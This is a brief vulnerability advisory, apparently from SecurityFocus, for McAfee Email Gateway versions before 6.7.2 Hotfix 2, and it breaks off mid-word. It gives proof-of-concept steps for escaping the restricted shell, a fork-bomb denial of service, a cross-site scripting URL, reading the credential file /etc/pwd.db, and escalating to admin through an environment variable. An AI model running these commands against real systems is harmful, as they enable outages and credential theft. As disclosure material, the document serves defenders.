source: https://www.securityfocus.com/bid/39242/info McAfee Email Gateway (formerly IronMail) is prone to multiple vulnerabilities, including: A local privilege-escalation vulnerability A denial-of-service vulnerability. Multiple cross-site scripting vulnerabilities An information-disclosure vulnerability An attacker may leverage these issues to completely compromise affected computers, execute arbitrary commands and script code, steal cookie-based authentication credentials, crash the affected application and gain access to sensitive information. Other attacks are also possible. Versions prior to McAfee Email Gateway 6.7.2 Hotfix 2 are vulnerable. Denial of Service: * In order to run the DoS, follow the steps below: [Secure Mail]: command rbash –noprofile [Secure Mail]: :(){:|:&};: Cross-site scripting https://www.example.com/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=&QtnType=9 Information Disclosure [Secure Mail]: command rbash –noprofile [Secure Mail]: grep -a '.*' /etc/pwd.db Local Privilege-Escalation: [Secure Mail]: command rbash –noprofile [Secure Mail]: declare -x USER="admin" If you want to check the new privilege: [Secure Mail]: cmd_admin set user unlock *** Invalid command: Usage - set user unlock *** [Secure Mail]: cmd_admin set user unlock admin Cannot unlock yourself. [Secure Mail]: exi